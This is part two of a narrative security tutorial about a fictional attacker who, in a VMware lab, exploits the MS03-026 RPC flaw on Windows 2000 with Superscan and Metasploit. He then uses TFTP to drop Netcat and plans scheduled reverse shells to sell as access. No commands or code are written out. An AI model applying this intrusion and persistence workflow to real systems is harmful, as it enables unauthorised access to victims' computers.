Shells for Sale! (Part 2)

If you missed the previous articles in this series please read:

We left off in part one having seen John go over his tool requirements, as well as methodology. He knew that could break into some computers, but he wanted to also safeguard his newly harvested victim. To that end he was planning on remotely installing the patch to plug the hole he had used to get in. He thought this a fairly crafty twist, and in reality it was not bad. This type of activity is actually seen in the wild, and has been chronicled by ensuing investigations into compromised computers. At this point John was now ready to do a practice run within his computer lab. All of the work would be done via two W2K Pro VMWare images. That way John did not have to possibly contaminate his own computer. Also he could take as many snapshots of his images thereby speeding up his research if he made a mistake. With that in hand let’s follow along, as John goes about his practice run.

Time for some fun

On the first W2K Pro image John fired up the Superscan port scanner as seen below.


Figure 1

We can see that he only entered the IP address of the other W2K Pro image, and also went with most of the other default options that Superscan defaults to. This scan, as seen below, reveals a wealth of information about the practice target.


Figure 2

We see that indeed port 135 is open, and actively listening for connections in both UDP and TCP. Furthermore, it also lists the name of the port 135 service ie: DCE aka Distributed Computer Environment endpoint resolution. This was indeed the exploitable service that John was after. Superscan, as we can see is really quite nice. You can see in the above noted picture that you have some very nice NetBIOS enumeration information. We can tell what type of operating system is running on the computer via the NetBIOS suffix, and who is logged on. It is very much a treasure trove of information, which is why these ports should always be firewalled off from external access.

With this information in hand John is now able to carry on with his practice run. The first step was simply to conduct a simulated whole sale scan of a cable modem range, in an effort to identify potential victims. It was now time to actively attack the IP addresses which were identified.


Figure 3

For simplicity’s sake John decided to go with the Metasploit Framework. This tool had been the testbed for a lot of his experimentation when it came to exploiting computers in his lab. You can see from the above that it is manipulated via a web browser. This is done by simply invoking it from the programs file and clicking on the msfweb option. Once done you simply point your browser to the following as seen in the DOS prompt that comes up; http://127.0.0.1:55555


Figure 4

From there we can see that we have to enter some other variables such as the remote destination IP address. There were several other options chosen prior to the screenshot noted above, but they are pretty intuitive.


Figure 5

Well we can now see from the above screenshot that the W2K Pro VMWare image that John is using to practice has now been successfully exploited. You will note that the picture says “shell started on session 1”. This means that John now has a reverse command shell waiting for him. All he needs to do is now click on the hyperlink “session 1”. As you may note the Metasploit Framework is indeed a very slick tool, that allows you the point and click ability to compromise computers. The true intention of this tool though is to aid the system administrator, or other computer security professional to verify the integrity of their network. This tool is also free as well, and is very much the equivalent to some of its commercial counterparts.


Figure 6

Now that John has a remote cmd.exe from the practice victim, he can now go ahead with the other stage of his simulated hack. This will encompass the transferring over from his TFTP server several files and programs. Specifically he will transfer over the following;

  1. the hotfix patch for the MS03-026 vulnerability
  2. the win32 port of Netcat
  3. a simple batch script to invoke Netcat or nc.exe

The next step for John now is to use the TFTP server he has running on his attacking computer to ferry over the files and programs he needs to further his exploitation of this computer.


Figure 7

We can see from the sample syntax in the screenshot how you would go about ferrying over such a file. This is also done via the built in TFTP client that comes with win32 operating systems. It is an important distinction to make ie: it is via the reverse command shell that the TFTP transfer is executed, and the files themselves are transferred over from the attackers TFTP server. Once all the files are transferred over, it is time to execute the next step. John issues the “time” command to find out what time the victim computer is in relation to his time. He sees that they are in the same time zone.


Figure 8

This is important, as John will be using this time comparison so that he knows when to have the AT command, he will schedule later on, to have his reverse shell come back to him at a predetermined time. This taking of the time relationship between both computers is a key one for John, as he intends to be able to customize the shells he later plans on selling to his customers. By taking the time sample he will be able to tell his prospective customers when they should expect to have their remote access start at. After all there is little sense in having Netcat sitting there listening on your computer if you don’t know when it will receive your remote cmd.exe.

It is at this point that we will break the article. In the last part of this article series we will see how John installs the hotfix patch to guard against potential hijacking of his newly compromised computer. Furthermore, we will also see him schedule a test AT command to have his reverse command shell come back to him via his listening session of Netcat. Lastly, we will also see John’s eventual downfall, as he takes his newly planned hacking for dollars to the real world, and quickly gets busted by the Federal police. See you in part three!

If you missed the previous articles in this series please read:

Leave a Comment

Your email address will not be published.

Scroll to Top